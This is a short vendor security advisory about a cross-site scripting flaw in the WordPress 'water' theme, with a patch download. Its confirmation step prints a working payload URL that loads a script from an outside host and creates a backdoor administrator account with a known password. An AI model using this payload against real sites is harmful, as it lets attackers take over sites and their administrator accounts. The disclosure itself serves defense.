WordPress water theme allows attackers to gain adminitrative privledges

On August 6, 2021 BitFire released a cross-site scripting vulnerability for the WordPress water theme. At the time of this writing there are several hundred websites currently using the theme. The flaw is introduced from several unchecked GET variables added to a link tag in the page's <head>. Possible full site compromise.

This flaw allows an attacker to craft a link to the target website that when clicked by the site administrator can result in a backdoor administrator account being created on the vulnerable site. The backdoor account could then be used to upload malware to the target site and/or restrict access to from the actual site administrator.

The theme developer could not be reached to create a patch for this issue. The following patch file is provided by BitFire. Download the patched header.php file with this link: header.php. then replace the file wp-content/themes/water/header.php with this patched version.

Vulnerability confirmation

If your site is vulnerable, you can visit any post (not the homepage) on your site and append the following to that URL:

?preview=true&stylesheet="><script+src=https://bitfire.co/tools/wpadmin.php><&template=z

If your site is vulnerable a new administrator user named system will be created with the password hacked. be sure to remove this account after. If the patch is successful, or if your site is running a WordPess firewall, no user account will be created.

BitFire customers are already protected from this and hundreeds of other vulnerabilities. Check out our guide to securing your WordPress or other PHP site for instructions on how you can prevent your site from being hacked.